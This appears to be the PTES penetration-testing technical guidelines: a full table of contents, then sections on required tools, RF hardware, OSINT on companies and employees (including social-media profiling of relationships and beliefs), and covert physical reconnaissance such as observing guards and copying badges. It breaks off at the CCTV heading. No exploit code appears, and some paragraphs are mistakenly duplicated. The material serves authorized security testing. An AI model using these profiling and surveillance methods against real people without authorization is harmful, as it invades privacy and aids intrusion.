PTES Technical Guidelines

This section is designed to be the PTES technical guidelines that help define certain procedures to follow during a penetration test. Something to be aware of is that these are only baseline methods that have been used in the industry. They will need to be continuously updated and changed upon by the community as well as within your own standard. Guidelines are just that, something to drive you in a direction and help during certain scenarios, but not an all encompassing set of instructions on how to perform a penetration test. Think outside of the box.

Contents

1Tools Required

1.1Operating Systems

1.1.1MacOS X

1.1.2VMware Workstation

1.1.2.1Linux

1.1.2.2Windows XP/7

1.2Radio Frequency Tools

1.2.1Frequency Counter

1.2.2Frequency Scanner

1.2.3Spectrum Analyzer

1.2.4802.11 USB adapter

1.2.5External Antennas

1.2.6USB GPS

1.3Software

2Intelligence Gathering

2.1OSINT

2.1.1Corporate

2.1.2Physical

2.1.2.1Locations

2.1.2.2Shared/Individual

2.1.2.3Owner

2.1.2.3.1Land/tax records

2.1.3Datacenter Locations

2.1.3.1Time zones

2.1.3.2Offsite gathering

2.1.3.3Product/Services

2.1.3.4Company Dates

2.1.3.5Position identification

2.1.3.6Organizational Chart

2.1.3.7Corporate Communications

2.1.3.7.1Marketing

2.1.3.7.2Lawsuits

2.1.3.7.3Transactions

2.1.3.8Job openings

2.1.4Relationships

2.1.4.1Charity Affiliations

2.1.4.2Network Providers

2.1.4.3Business Partners

2.1.4.4Competitors

2.2Individuals

2.2.1Social Networking Profile

2.2.2Social Networking Websites

2.2.3Cree.py

2.3Internet Footprint

2.3.1Email addresses

2.3.1.1Maltego

2.3.1.2TheHarvester

2.3.1.3NetGlub

2.3.2Usernames/Handles

2.3.3Social Networks

2.3.3.1Newsgroups

2.3.3.2Mailing Lists

2.3.3.3Chat Rooms

2.3.3.4Forums Search

2.3.4Personal Domain Names

2.3.5Personal Activities

2.3.5.1Audio

2.3.5.2Video

2.3.6Archived Information

2.3.7Electronic Data

2.3.7.1Document leakage

2.3.7.2Metadata leakage

2.3.7.2.1FOCA (Windows)

2.3.7.2.2Foundstone SiteDigger (Windows)

2.3.7.2.3Metagoofil (Linux/Windows)

2.3.7.2.4Exif Reader (Windows)

2.3.7.2.5ExifTool (Windows/ OS X)

2.3.7.2.6Image Search

2.4Covert gathering

2.4.1On-location gathering

2.4.1.1Adjacent Facilities

2.4.1.2Physical security inspections

2.4.1.2.1Security guards

2.4.1.2.2Badge Usage

2.4.1.2.3Locking devices

2.4.1.2.4Intrusion detection systems (IDS)/Alarms

2.4.1.2.5Security lighting

2.4.1.2.6Surveillance /CCTV systems

2.4.1.2.7Access control devices

2.4.1.2.8Environmental Design

2.4.1.3Employee Behavior

2.4.1.4Dumpster diving

2.4.1.5RF / Wireless Frequency scanning

2.4.2Frequency Usage

2.4.3Equipment Identification

2.4.3.1Airmon-ng

2.4.3.2Airodump-ng

2.4.3.3Kismet-Newcore

2.4.3.4inSSIDer

2.5External Footprinting

2.5.1Identifying IP Ranges

2.5.1.1WHOIS lookup

2.5.1.2BGP looking glasses

2.5.2Active Reconnaissance

2.5.3Passive Reconnaissance

2.5.4Active Footprinting

2.5.4.1Zone Transfers

2.5.4.1.1Host

2.5.4.1.2Dig

2.5.4.2Reverse DNS

2.5.4.3DNS Bruting

2.5.4.3.1Fierce2 (Linux)

2.5.4.3.2DNSEnum (Linux)

2.5.4.3.3Dnsdict6 (Linux)

2.5.4.4Port Scanning

2.5.4.4.1Nmap (Windows/Linux)

2.5.4.5SNMP Sweeps

2.5.4.5.1SNMPEnum (Linux)

2.5.4.6SMTP Bounce Back

2.5.4.7Banner Grabbing

2.5.4.7.1HTTP

2.6Internal Footprinting

2.6.1Active Footprinting

2.6.1.1Ping Sweeps

2.6.1.1.1Nmap (Windows/Linux)

2.6.1.1.2Alive6 (Linux)

2.6.1.2Port Scanning

2.6.1.2.1Nmap (Windows/Linux)

2.6.1.3SNMP Sweeps

2.6.1.3.1SNMPEnum (Linux)

2.6.1.4Metasploit

2.6.1.5Zone Transfers

2.6.1.5.1Host

2.6.1.5.2Dig

2.6.1.6SMTP Bounce Back

2.6.1.7Reverse DNS

2.6.1.8Banner Grabbing

2.6.1.8.1HTTP

2.6.1.8.2httprint

2.6.1.9VoIP mapping

2.6.1.9.1Extensions

2.6.1.9.2Svwar

2.6.1.9.3enumIAX

2.6.1.10Passive Reconnaissance

2.6.1.10.1Packet Sniffing

3Vulnerability Analysis

3.1Vulnerability Testing

3.1.1Active

3.1.2Automated Tools

3.1.2.1Network/General Vulnerability Scanners

3.1.2.2Open Vulnerability Assessment System (OpenVAS) (Linux)

3.1.2.3Nessus (Windows/Linux)

3.1.2.4NeXpose

3.1.2.5eEYE Retina

3.1.2.6Qualys

3.1.2.7Core IMPACT

3.1.2.7.1Core IMPACT Web

3.1.2.7.2Core IMPACT WiFi

3.1.2.7.3Core IMPACT Client Side

3.1.2.7.4Core Web

3.1.2.7.5coreWEBcrawl

3.1.2.7.6Core Onestep Web RPTs

3.1.2.7.7Core WiFi

3.1.2.8SAINT

3.1.2.8.1SAINTscanner

3.1.2.8.2SAINTexploit

3.1.2.8.3SAINTwriter

3.1.3Web Application Scanners

3.1.3.1General Web Application Scanners

3.1.3.1.1WebInspect (Windows)

3.1.3.1.2IBM AppScan

3.1.3.1.3Web Directory Listing/Bruteforcing

3.1.3.1.4Webserver Version/Vulnerability Identification

3.1.3.2NetSparker (Windows)

3.1.3.3Specialized Vulnerability Scanners

3.1.3.3.1Virtual Private Networking (VPN)

3.1.3.3.2IPv6

3.1.3.3.3War Dialing

3.1.4Passive Testing

3.1.4.1Automated Tools

3.1.4.1.1Traffic Monitoring

3.1.4.2Wireshark

3.1.4.3Tcpdump

3.1.4.4Metasploit Scanners

3.1.4.4.1Metasploit Unleashed

3.2Vulnerability Validation

3.2.1Public Research

3.2.1.1Common/default passwords

3.2.2Establish target list

3.2.2.1Mapping Versions

3.2.2.2Identifying Patch Levels

3.2.2.3Looking for Weak Web Applications

3.2.2.4Identify Weak Ports and Services

3.2.2.5Identify Lockout threshold

3.3Attack Avenues

3.3.1Creation of Attack Trees

3.3.2Identify protection mechanisms

3.3.2.1Network protections

3.3.2.1.1“Simple” Packet Filters

3.3.2.1.2Traffic shaping devices

3.3.2.1.3Data Loss Prevention (DLP) systems

3.3.2.2Host based protections

3.3.2.2.1Stack/heap protections

3.3.2.2.2Whitelisting

3.3.2.2.3AV/Filtering/Behavioral Analysis

3.3.2.3Application level protections

4Exploitation

4.1Precision strike

4.1.1Countermeasure Bypass

4.1.1.1AV

4.1.1.2Human

4.1.1.3HIPS

4.1.1.4DEP

4.1.1.5ASLR

4.1.1.6VA + NX (Linux)

4.1.1.7w^x (OpenBSD)

4.1.1.8WAF

4.1.1.9Stack Canaries

4.1.1.9.1Microsoft Windows

4.1.1.9.2Linux

4.1.1.9.3MAC OS

4.2Customized Exploitation

4.2.1Fuzzing

4.2.2Dumb Fuzzing

4.2.3Intelligent Fuzzing

4.2.4Sniffing

4.2.4.1Wireshark

4.2.4.2Tcpdump

4.2.5Brute-Force

4.2.5.1Brutus (Windows)

4.2.5.2Web Brute (Windows)

4.2.5.3THC-Hydra/XHydra

4.2.5.4Medusa

4.2.5.5Ncrack

4.2.6Routing protocols

4.2.7Cisco Discovery Protocol (CDP)

4.2.8Hot Standby Router Protocol (HSRP)

4.2.9Virtual Switch Redundancy Protocol (VSRP)

4.2.10Dynamic Trunking Protocol (DTP)

4.2.11Spanning Tree Protocol (STP)

4.2.12Open Shortest Path First (OSPF)

4.2.13RIP

4.2.14VLAN Hopping

4.2.15VLAN Trunking Protocol (VTP)

4.3RF Access

4.3.1Unencrypted Wireless LAN

4.3.1.1Iwconfig (Linux)

4.3.1.2Windows (XP/7)

4.3.2Attacking the Access Point

4.3.2.1Denial of Service (DoS)

4.3.3Cracking Passwords

4.3.3.1WPA-PSK/ WPA2-PSK

4.3.3.2WPA/WPA2-Enterprise

4.3.4Attacks

4.3.4.1LEAP

4.3.4.1.1Asleap

4.3.4.2802.1X

4.3.4.2.1Key Distribution Attack

4.3.4.2.2RADIUS Impersonation Attack

4.3.4.3PEAP

4.3.4.3.1RADIUS Impersonation Attack

4.3.4.3.2Authentication Attack

4.3.4.4EAP-Fast

4.3.4.5WEP/WPA/WPA2

4.3.4.6Aircrack-ng

4.4Attacking the User

4.4.1Karmetasploit Attacks

4.4.2DNS Requests

4.4.3Bluetooth

4.4.4Personalized Rogue AP

4.4.5Web

4.4.5.1SQL Injection (SQLi)

4.4.5.2XSS

4.4.5.3CSRF

4.4.6Ad-Hoc Networks

4.4.7Detection bypass

4.4.8Resistance of Controls to attacks

4.4.9Type of Attack

4.4.10The Social-Engineer Toolkit

4.5VPN detection

4.6Route detection, including static routes

4.6.1Network Protocols in use

4.6.2Proxies in use

4.6.3Network layout

4.6.4High value/profile targets

4.7Pillaging

4.7.1Video Cameras

4.7.2Data Exfiltration

4.7.3Locating Shares

4.7.4Audio Capture

4.7.5High Value Files

4.7.6Database Enumeration

4.7.7Wifi

4.7.8Source Code Repos

4.7.9Git

4.7.10Identify custom apps

4.7.11Backups

4.8Business impact attacks

4.9Further penetration into infrastructure

4.9.1Pivoting inside

4.9.1.1History/Logs

4.9.2Cleanup

4.10Persistence

5Post Exploitation

5.1Windows Post Exploitation

5.1.1Blind Files

5.1.2Non Interactive Command Execution

5.1.3System

5.1.4Networking (ipconfig, netstat, net)

5.1.5Configs

5.1.6Finding Important Files

5.1.7Files To Pull (if possible)

5.1.8Remote System Access

5.1.9Auto-Start Directories

5.1.10Binary Planting

5.1.11Deleting Logs

5.1.12Uninstalling Software “AntiVirus” (Non interactive)

5.1.13Other

5.1.13.1Operating Specific

5.1.13.1.1Win2k3

5.1.13.1.2Vista/7

5.1.13.1.3Vista SP1/7/2008/2008R2 (x86 & x64)

5.1.14Invasive or Altering Commands

5.1.15Support Tools Binaries / Links / Usage

5.1.15.1Various tools

5.2Obtaining Password Hashes in Windows

5.2.1LSASS Injection

5.2.1.1Pwdump6 and Fgdump

5.2.1.2Hashdump in Meterpreter

5.2.2Extracting Passwords from Registry

5.2.2.1Copy from the Registry

5.2.2.2Extracting the Hashes

5.2.3Extracting Passwords from Registry using Meterpreter

6Reporting

6.1Executive-Level Reporting

6.2Technical Reporting

6.3Quantifying the risk

6.4Deliverable

7Custom tools developed

8Appendix A – Creating OpenVAS “Only Safe Checks” Policy

8.1General

8.2Plugins

8.3Credentials

8.4Target Selection

8.5Access Rules

8.6Preferences

8.7Knowledge Base

9Appendix B – Creating the “Only Safe Checks” Policy

9.1General

9.2Credentials

9.3Plugins

9.4Preferences

10Appendix C – Creating the “Only Safe Checks (Web)” Policy

10.1General

10.2Credentials

10.3Plugins

10.4Preferences

11Appendix D – Creating the “Validation Scan” Policy

11.1General

11.2Credentials

11.3Plugins

11.4Preferences

12Appendix E – NeXpose Default Templates

12.1Denial of service

12.2Discovery scan

12.3Discovery scan (aggressive)

12.4Exhaustive

12.5Full audit

12.6HIPAA compliance

12.7Internet DMZ audit

12.8Linux RPMs

12.9Microsoft hotfix

12.10Payment Card Industry (PCI) audit

12.11Penetration test

12.12Penetration test

12.13Safe network audit

12.14Sarbanes-Oxley (SOX) compliance

12.15SCADA audit

12.16Web audit

Tools Required

Selecting the tools required during a penetration test depends on several factors such as the type and the depth of the engagement. In general terms, the following tools are mandatory to complete a penetration test with the expected results.

Operating Systems

Selecting the operating platforms to use during a penetration test is often critical to the successfully exploitation of a network and associated system. As such it is a requirement to have the ability to use the three major operating systems at one time. This is not possible without virtualization.

MacOS X

MacOS X is a BSD-derived operating. With standard command shells (such as sh, csh, and bash) and native network utilities that can be used during a penetration test (including telnet, ftp, rpcinfo, snmpwalk, host, and dig) it is the system of choice and is the underlying host system for our penetration testing tools. Since this is a hardware platform as well, this makes the selection of specific hardware extremely simple and ensures that all tools will work as designed.

VMware Workstation

VMware Workstation is an absolute requirement to allow multiple instances of operating systems easily on a workstation. VMware Workstation is a fully supported commercial package, and offers encryption capabilities and snapshot capabilities that are not available in the free versions available from VMware. Without the ability to encrypt the data collected on a VM confidential information will be at risk, therefore versions that do not support encryption are not to be used. The operating systems listed below should be run as a guest system within VMware.

Linux

Linux is the choice of most security consultants. The Linux platform is versatile, and the system kernel provides low-level support for leading-edge technologies and protocols. All mainstream IP-based attack and penetration tools can be built and run under Linux with no problems. For this reason, BackTrack is the platform of choice as it comes with all the tools required to perform a penetration test.

Windows XP/7

Windows XP/7 is required for certain tools to be used. Many commercial tools or Microsoft specific network assessment and penetration tools are available that run cleanly on the platform.

Radio Frequency Tools

Frequency Counter

A Frequency Counter should cover from 10Hz- 3 GHz. A good example of a reasonably priced frequency counter is the MFJ-886 Frequency Counter.

Frequency Scanner

A scanner is a radio receiver that can automatically tune, or scan, two or more discrete frequencies, stopping when it finds a signal on one of them and then continuing to scan other frequencies when the initial transmission ceases. These are not to be used in Florida, Kentucky, or Minnesota unless you are a person who holds a current amateur radio license issued by the Federal Communications Commission. The required hardware is the Uniden BCD396T Bearcat Handheld Digital Scanner or PSR-800 GRE Digital trunking scanner.

Spectrum Analyzer

A spectrum analyzer is a device used to examine the spectral composition of some electrical, acoustic, or optical waveform. A spectrum analyzer is used to determine whether or not a wireless transmitter is working according to federally defined standards and is used to determine, by direct observation, the bandwidth of a digital or analog signal. A good example of a reasonably priced spectrum analyzer is the Kaltman Creations HF4060 RF Spectrum Analyzer.

802.11 USB adapter

An 802.11 USB adapter allow for the easy connection of a wireless adapter to the penetration testing system. There are several issues with using something other than the approved USB adapter as not all of them support the required functions. The required hardware is the Alfa AWUS051NH 500mW High Gain 802.11a/b/g/n high power Wireless USB.

External Antennas

External antennas come in a variety of shapes, based upon the usage and with a variety of connectors. All external antennas must have RP-SMA connectors that are compatible with the Alfa. Since the Alfa comes with an Omni-directional antenna, we need to obtain a directional antenna. The best choice is a panel antenna as it provides the capabilities required in a package that travels well. The required hardware is the L-com 2.4 GHz 14 dBi Flat Panel Antenna with RP-SMA connector. A good magnetic mount Omni-directional antenna such as the L-com 2.4 GHz/900 MHz 3 dBi Omni Magnetic Mount Antenna with RP-SMA Plug Connector is a good choice.

USB GPS

A GPS is a necessity to properly perform an RF assessment. Without this it’s simply impossible to determine where and how far RF signals are propagating. There are numerous options are available, therefore you should look to obtain a USB GPS that is supported on operating system that you are using be that Linux, Windows and Mac OS X.

Software

The software requirements are based upon the engagement scope, however we’ve listed some commercial and open source software that could be required to properly conduct a full penetration test.

Intelligence Gathering

Intelligence Gathering is the phase where data or “intelligence” is gathered to assist in guiding the assessment actions. At the broadest level this intelligence gathering includes information about employees, facilities, products and plans. Within a larger picture this intelligence will include potentially secret or private “intelligence” of a competitor, or information that is otherwise relevant to the target.

OSINT

Open Source Intelligence (OSINT) in the simplest of terms is locating, and analyzing publically (open) available sources of information. The key component here is that this intelligence gathering process has a goal of producing current and relevant information that is valuable to either an attacker or competitor. For the most part, OSINT is more than simply performing web searches using various sources.

Corporate

Information on a particular target should include information regarding the legal entity. Most states within the US require Corporations, limited liability companies and limited partnerships to file with the State division. This division serves as custodian of the filings and maintains copies and/or certifications of the documents and filings. This information may contain information regarding shareholders, members, officers or other persons involved in the target entity.

Physical

Often the first step in OSINT is to identify the physical locations of the target corporation. This information might be readily available for publically known or published locations, but not quite so easy for more secretive sites. Public sites can often be location by using search engines such as:

Google -http://www.google.com

Yahoo – http://yahoo.com

Bing – http://www.bing.com

Ask.com – http://ask.com

Locations

Shared/Individual

As part of identifying the physical location it is important to note if the location is an individual building or simply a suite in a larger facility. It is important to attempt to identify neighboring businesses as well as common areas.

Owner

Once the physical locations have been identified, it is useful to identify the actual property owner(s). This can either be an individual, group, or corporation. If the target corporation does not own the property then they may be limited in what they can physically do to enhance or improve the physical location.

Land/tax records

Tax records:

Land and tax records generally include a wealth of information on a target such as ownership, possession, mortgage companies, foreclosure notices, photographs and more. The information recorded and level of transparency varies greatly by jurisdiction. Land and tax records within the United States are typically handled at the county level.

Building department:

The building department generally has floor plans, old & current permits, tenant improvement information and other similar information on file. Buried in that information might be names of contracting firms, engineers, architects and more. All of which could be used with a tool such as SET. In most cases, a phone call will be required to obtain any of this information but most building departments are happy to hand it out to anyone who asks.

Datacenter Locations

Identifying any target business data center locations via either the corporate website, public filings, land records or via a search engine can provide additional potential targets.

Time zones

Identifying the time zones that the target operates in provides valuable information regarding the hours of operation. It is also significant to understand the relationship between the target time zone and that of the assessment team. A time zone map is often useful as a reference when conducting any test.

Offsite gathering

Identifying any recent or future offsite gatherings or parties via either the corporate website or via a search engine can provide valuable insight into the corporate culture of a target. It is often common practice for businesses to have offsite gatherings not only for employees, but also for business partners and customers. Collecting this data could provide insight into potential items of interest to an attacker.

Product/Services

Identifying the target business products and any significant data related to such launches via the corporate website, new releases or via a search engine can provide valuable insight into the internal workings of a target. It is often common practice for businesses to make such notifications publicly in an effort to garner publicity and to inform current and/or new customers of the launch. Publicly available information includes, but is not limited to, foreign language documents, radio and television broadcasts, Internet sites, and public speaking.

Company Dates

Significant company dates can provide insight into potential days where staff may be on alert higher than normal. This could be due to potential corporate meetings, board meetings, investor meetings, or corporate anniversary. Normally, businesses that observe various holidays have a significantly reduced staff and therefore targeting may prove to be much more difficult during these periods.

Position identification

Within every target it is critical that you identify and document the top positions within the organization. This is critical to ensure that the resulting report is targeting the correct audience. At a minimum, key employees should be identified as part of any engagement.

Organizational Chart

Understanding the organizational structure is important, not only to understand the depth of the structure, but also the breadth. If the organization is extremely large, it is possible that new staff or personnel could go undetected. In smaller organizations, the likelihood is not as great. Getting a good picture of this structure can also provide insight into the functional groups. This information can be useful in determining internal targets.

Corporate Communications

Identifying corporate communications either via the corporate website or a job search engine can provide valuable insight into the internal workings of a target.

Marketing

Marketing communications are often used to make corporate announcements regarding currently, or future product releases, and partnerships.

Lawsuits

Communications regarding the targets involvement in litigation can provide insight into potential threat agent or data of interest.

Transactions

Communications involving corporate transactions may be indirect response to a marketing announcement or lawsuit.

Job openings

Searching current job openings or postings via either the corporate website or via a job search engine can provide valuable insight into the internal workings of a target. It is often common practice to include information regarding currently, or future, technology implementations. Collecting this data could provide insight into potential items of interest to an attacker. Several Job Search Engines exist that can be queried for information regarding the target.

Relationships

Identifying the targets logical relationships is critical to understand more about how the business operates. Publicly available information should be leveraged to determine the target business relationship with vendors, business partners, law firms, etc. This is often available via news releases, corporate web sites (target and vendors), and potentially via industry related forums.

Charity Affiliations

Identifying any target business charity affiliations via either the corporate website or via a search engine can provide valuable insight into the internal workings and potentially the corporate culture of a target. It is often common practice for businesses to make charitable donations to various organizations. Collecting this data could provide insight into potential items of interest to an attacker.

Network Providers

Identifying any network provisioning or providers either via the allocated netblock /address information, corporate website or via a search engine can provide valuable insight into the potentially of a target. It is often common practice for businesses to make charitable donations to various organizations. Collecting this data could provide insight into potential items of interest to an attacker.

Business Partners

Identifying business partners is critical to gaining insight into not only the corporate culture of a target, but also potentially technologies being used. It is often common practice for businesses to announce partnership agreements. Collecting this data could provide insight into potential items of interest to an attacker.

Competitors

Identifying competitors can provide a window into potential adversaries. It is not uncommon for competitors to announce news that could impact the target. These could range from new hires, product launches, and even partnership agreements. Collecting this data is important to fully understand any potential corporate hostility.

Individuals

Social Networking Profile

The numbers of active Social Networking websites as well as the number of users make this a prime location to identify employee’s friendships, kinships, common interest, financial exchanges, likes/dislikes, sexual relationships, or beliefs. It is even possible to determine an employee’s corporate knowledge or prestige.

Social Networking Websites

Tone and Frequency

Location awareness

Cree.py

Cree.py is Beta tool that is used to automate the task of information gathering from Twitter as well as FourSquare. In addition, Cree.py can gather any geolocation data from flickr, twitpic.com, yfrog.com, img.ly, plixi.com, twitrpix.com, foleext.com, shozu.com, pickhur.com, moby.to, twitsnaps.com and twitgoo.com. Cree.py is an open source intelligence gathering application. To install Cree.py, you will need to add a repository to your /etc/apt/sources.list.

Update package list

Install creepy

Cree.py Interface

Cree.py Interface

Internet Footprint

Internet Footprinting is where we attempt to gather externally available information about the target infrastructure that we can leveraged in later phases.

Email addresses

Gathering email addresses while seemingly useless can provide us with valuable information about the target environment. It can provide information about potential naming conventions as well as potential targets for later use. There are many tools that can be used to gather email addresses, Maltego for example.

Maltego

Paterva Maltego is used to automate the task of information gathering. Maltego is an open source intelligence and forensics application. Essentially, Maltego is a data mining and information-gathering tool that maps the information gathered into a format that is easily understood and manipulated. It saves you time by automating tasks such as email harvesting and mapping subdomains. The documentation of Maltego is relatively sparse so we are including the procedures necessary to obtain the data required.

Screenshot Here

To start, look to the very upper left-hand corner of Maltego and click the “new graph” button. After that, drag the “domain” item out of the palette onto the graph. The graph area allows you to process the transforms as well as view the data in either the mining view, dynamic view, edge weighted view as well as the entity list. When you first add the domain icon to your graph, it will default to “paterva.com” double-click on that icon and change the name to your target’s domain(without any subdomain such as www). Now you are ready to start mining.

After this point, you should be able to use your imagination as to where to go next. You will be able to cultivate phone numbers, email addresses, geo location information and much more by using the transforms provided. The Palette contains all the transforms that are available (or activated) for use. As of this writing, there are approximately 72 transforms. One limitation of the “Community Edition” of Maltego is that any given transform will only return 12 results whereas the professional version doesn’t have any limitations.

Maltego is not just limited to the pre-engagement portion of your pentest. You can also import csv/xls dumps of your airodump results back into Maltego to help you visualize the networks.

TheHarvester

TheHarvester is a tool, written by Christian Martorella, that can be used to gather e-mail accounts and subdomain names from different public sources (search engines, pgp key servers). Is a really simple tool, but very effective.

TheHarvester will search the specified data source and return the results. This should be added to the OSINT document for use at a later stage.

NetGlub

NetGlub is an open source tool that is very similar to Maltego. NetGlub is a data mining and information-gathering tool that presents the information gathered in a format that is easily understood. The documentation of NetGlub is nonexistent at the moment so we are including the procedures necessary to obtain the data required.

At this point we’re going to use a GUI installation of the QT-SDK. The main thing to point out here is that the installation path needs to be changed during the installation to reflect /opt/qtsdk. If you use a different path, then you will need to update the paths in the script below to reflect that difference.

Now we need to start MySQL and create the netglub database

Once you have installed NetGlub, you’ll probably be interested in running it. This is really a four step process: Ensure that MySQL is running:

Start the NetGlub Master:

Start the NetGlub Slave:

Start the NetGlub GUI:

Now the main interface should be visible. If you are familiar with Maltego, then you will feel right at home with the interface. The six main areas of the interface are the toolbar, the Palette, graph, (or view) area, details, and the property area.

A complete list of all the transforms that are available (or activated) for use. As of this writing, there are approximately 33 transforms. A transform is script that will actually perform the action against a given site.

The graph area allows you to process the transforms as well as view the data in either the mining view, dynamic view, edge weighted view as well as the entity list. The overview area provides a mini-map of the entities discovered based upon the transforms. The detail area is where it is possible to drill into the specifics of the entity. It is possible to view such things as the relationships, as well as details of how the information was generated. The property area allows you to see the specific properties of the transform populated with the results specific to the entity. To begin using NetGlub we need to drag and drop a transform from the Palette to the Graph Area. By default, this will be populated with dummy data. To edit the entity within the selected transform, do so by editing the entries within the property view.

The data from these entities will be used to obtain additional information. Within the graph area the results will be visible as illustrated below.

Selecting the entities and choosing to run additional transforms the data collected will expand. If a particular transform has not be used that you want to collect data from, simply drag it to the graph area and make the appropriate changes within the property view.

For Alchemy, you will need to go to http://www.alchemyapi.com/api/register.html to receive your own API key. For Open calais, you will need to go to http://www.opencalais.com/APIkey to receive your own API key.

Usernames/Handles

Identifying usernames and handles that are associated with a particular email is useful as this might provide several key pieces of information. For instance, it could provide a significant clue for username and passwords. In addition, it can also indicate a particular individual’s interest outside of work. A good place to location this type of information is within discussion groups (Newsgroups, Mailing lists, forums, chat rooms, etc.).

Social Networks

Check Usernames – Useful for checking the existence of a given username across 160 Social Networks.

Newsgroups

Google – http://www.google.com

Yahoo Groups – http://groups.yahoo.com

Delphi Forums – http://www.delphiforums.com

Big Boards – http://www.big-boards.com

Mailing Lists

TILE.Net – http://tile.net/lists

Topica – http://lists.topica.com

L-Soft CataList, the Official Catalog of LISTSERV lists – http://www.lsoft.com/lists/listref.html

The Mail Archive – http://www.mail-archive.com

Chat Rooms

SearchIRC – http://searchirc.com

Gogloom – http://www.gogloom.com

Forums Search

BoardReader – http://boardreader.com

Omgili – http://www.omgili.com

Personal Domain Names

The ability to locate personal domains that belong to target employees can yield additional information such as potential usernames and passwords. In addition, it can also indicate a particular individual’s interest outside of work.

Personal Activities

It is not uncommon for individuals to create and publish audio files and videos. While these may be seem insignificant, they can yield additional information about a particular individual’s interest outside of work.

Audio

iTunes – http://www.apple.com/itunes

Podcast.com – http://podcast.com

Podcast Directory – http://www.podcastdirectory.com

Yahoo! Audio Search – http://audio.search.yahoo.com

Video

YouTube – http://youtube.com

Yahoo Video – http://video.search.yahoo.com

Google Video – http://video.google.com

Bing Video – http://www.bing.com/videos

Archived Information

There are times when we will be unable to access web site information due to the fact that the content may no longer be available from the original source. Being able to access archived copies of this information allows access to past information. There are several ways to access this archived information. The primary means is to utilize the cached results under Google’s cached results. As part of an NVA, it is not uncommon to perform Google searches using specially targeted search strings: cache:<site.com>

An additional resource for archived information is the Wayback Machine (http://www.archive.org).

Electronic Data

Collection of electronic data in direct response to reconnaissance and intelligence gathering should be focused on the target business or individual.

Document leakage

Publicly available documents should be gathered for essential data (date, time, location specific information, language, and author). Data collected could provide insight into the current environment, operational procedures, employee training, and human resources.

Metadata leakage

Identifying Metadata is possible using specialized search engine. The goal is to identify data that is relevant to the target corporation. It may be possible to identify locations, hardware, software and other relevant data from Social Networking posts. Some search engines that provide the ability to search for Metadata are as follows:

ixquick – http://ixquick.com

MetaCrawler – http://metacrawler.com

Dogpile – http://www.dogpile.com

Search.com – http://www.search.com

Jeffery’s Exif Viewer – http://regex.info/exif.cgi

In addition to search engines, several tools exist to collect files and gather information from various documents.

FOCA (Windows)

FOCA is a tool that reads metadata from a wide range of document and media formats. FOCA pulls the relevant usernames, paths, software versions, printer details, and email addresses. This can all be performed without the need to individually download files.

Foundstone SiteDigger (Windows)

Foundstone has a tool, named SiteDigger, which allows us to search a domain using specially strings from both the Google Hacking Database (GHDB) and Foundstone Database (FSDB). This allows for slightly over 1640 potential queries available to discover additional information. Screenshot Here

Metagoofil (Linux/Windows)

Metagoofil is a Linux based information gathering tool designed for extracting metadata of public documents (.pdf, .doc, .xls, .ppt, .odp, .ods) available on the client’s websites.

Metagoofil has a few options available, but most are related to what specifically you want to target as well the number of results desired.

The command to run metagoofil is as follows:

Exif Reader (Windows)

Exif Reader is image file analysis software for Windows. It analyzes and displays the shutter speed, flash condition, focal length, and other image information included in the Exif image format which is supported by almost all the latest digital cameras. Exif image files with an extension of JPG can be treated in the same manner as conventional JPEG files. This software analyzes JPEG files created by digital cameras and can be downloaded from http://www.takenet.or.jp/~ryuuji/minisoft/exifread/english.

ExifTool (Windows/ OS X)

Exif Tool is a Windows and OS X tool for reading Meta information. ExifTool supports a wide range of file formats. ExifTool can be downloaded from http://www.sno.phy.queensu.ca/~phil/exiftool.

Image Search

While not directly related to metadata, Tineye is also useful: http://www.tineye.com/ If a profile is found that includes a picture, but not a real name, Tineye can sometimes be used to find other profiles on the Internet that may have more information about a person (including personals sites).

Covert gathering

On-location gathering

On-Site visits also allow assessment personnel to observe and gather information about the physical, environmental, and operational security of the target.

Adjacent Facilities

Once the physical locations have been identified, it is useful to identify the adjacent facilities. Adjacent facilities should be documented and if possible, include any observed shared facilities or services.

Physical security inspections

Covert Physical security inspections are used to ascertain the security posture of the target. These are conducted covertly, clandestinely and without any party knowing they are being inspected. Observation is the key component of this activity. Physical security measures that should be observed include physical security equipment, procedures, or devices used to protect from possible threats. A physical security inspection should include, but is not limited to the following:

Security guards

Observing security guards (or security officer) is often the first step in assessing the most visible deterrence. Security guards are uniformed and act to protect property by maintaining a high visibility presence to deter illegal and inappropriate actions. By observing security guard movements directly it is possible to determine procedures in use or establish movement patterns. You will need to observe what the security guards are protecting. It is possible to utilize binoculars to observe any movement from a safe distance.

Badge Usage

Badge usage refers to a physical security method that involves the use of identification badges as a form of access control. Badging systems may be tied to a physical access control system or simply used as a visual validation mechanism. Observing individual badge usage is important to document. By observing, badge usage it may be possible to actually duplicate the specific badge being utilized. The specific items that should be noted are if the badge is required to be visible or shown to gain physical access to the property or facility. Badge usage should be documented and if possible, include observed validation procedures.

Locking devices

A locking device is a mechanical or electronic mechanism often implemented to prevent unauthorized ingress or egress. These can be as simple as a door lock, dead-bolt, or complex as a cipher lock. Observing the type and placement location of the locking devices on doors it is possible to determine if the door in primarily used for ingress or egress. You will need to observe what the locking devices are protecting. All observations should be documented prior, and if possible photographs taken.

Intrusion detection systems (IDS)/Alarms

Observing security guards (or security officer) is often the first step in assessing the most visible deterrence. Security guards are uniformed and act to protect property by maintaining a high visibility presence to deter illegal and inappropriate actions. By observing security guard movements directly it is possible to determine procedures in use or establish movement patterns. You will need to observe what the security guards are protecting. It is possible to utilize binoculars to observe any movement from a safe distance.

Security lighting

Security lighting is often used as a preventative and corrective measure on a physical piece of property. Security lighting may aid in the detection of intruders, act as deterrence to intruders, or in some cases simply to increase the feeling of safety. Security lighting is often an integral component to the environmental design of a facility. Security lighting includes floodlights and low pressure sodium vapor lights. Most Security lighting that is intended to be left on all night is of the high-intensity discharge lamp variety. Other lights may be activated by sensors such as passive infrared sensors (PIRs), turning on only when a person (or other mammal) approaches. PIR activated lamps will usually be incandescent bulbs so that they can activate instantly; energy saving is less important since they will not be on all the time. PIR sensor activation can increase both the deterrent effect (since the intruder knows that he has been detected) and the detection effect (since a person will be attracted to the sudden increase in light). Some PIR units can be set up to sound a chime as well as turn on the light. Most modern units have a photocell so that they only turn on when it is dark.

Security lighting may be subject to vandalism, possibly to reduce its effectiveness for a subsequent intrusion attempt. Thus security lights should either be mounted very high, or else protected by wire mesh or tough polycarbonate shields. Other lamps may be completely recessed from view and access, with the light directed out through a light pipe, or reflected from a polished aluminum or stainless steel mirror. For similar reasons high security installations may provide a stand-by power supply for their security lighting. Observe and document the type, number, and locations of security lighting in use.

Surveillance /CCTV systems

